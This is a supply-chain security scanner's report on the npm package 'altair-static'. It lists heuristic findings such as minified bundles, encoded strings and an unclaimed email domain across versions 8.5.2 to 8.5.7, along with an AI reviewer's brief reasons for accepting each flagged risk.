altair-static
Supply chain provenance
Status for the latest visible version.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:build/dist/worker-2ZPX3FTR.js | AI (source-diff): Standard bundled worker output with Sentry debug IDs; expected for this package. | ai | |
| source-diff | obfuscated-file:build/dist/iframe-sandbox/assets/index-DN1P4DX8.js | AI (source-diff): Standard Vite-bundled minified output for a GraphQL client UI; not malicious obfuscation. | ai | |
| source-diff | obfuscated-file:build/dist/iframe-sandbox/assets/index-DL_PXIxX.js | AI (source-diff): Minified Vite build artifact for iframe sandbox; expected in this package. | ai | |
| source-diff | obfuscated-file:build/dist/worker-JHIJ5B6A.js | AI (source-diff): Minified web worker bundle; consistent with Altair's GraphQL client architecture. | ai | |
| publish-pattern | rapid-publish | AI (publish-pattern): Automated CI/CD monorepo releases; rapid successive publishes are expected. | ai | |
| source-diff | encoded-string-file:build/dist/main.js | AI (source-diff): Long strings in minified Angular/GraphQL client bundle; no malicious payload pattern. | ai | |
| source-diff | net-exec-file:build/dist/chunk-7THP26YK.js | AI (source-diff): Standard Vite-bundled frontend chunk with Sentry instrumentation; not a dropper. | ai | |
| email-domain | unclaimed-email:sirmuel.design | AI (email-domain): Long-established package with SLSA provenance; domain lapse is a latent risk but no active hijack evidence. | ai |
Versions (showing 6 of 6)
| Version | Deps | Published |
|---|---|---|
| 8.5.7 | 1 / 9 | |
| 8.5.6 | 1 / 9 | |
| 8.5.5 | 1 / 9 | |
| 8.5.4 | 1 / 9 | |
| 8.5.3 | 1 / 9 | |
| 8.5.2 | 1 / 9 |
v8.5.7
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.6
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.5
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.4
1 findingPublished via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v8.5.3
5 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Modified file contains 2 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.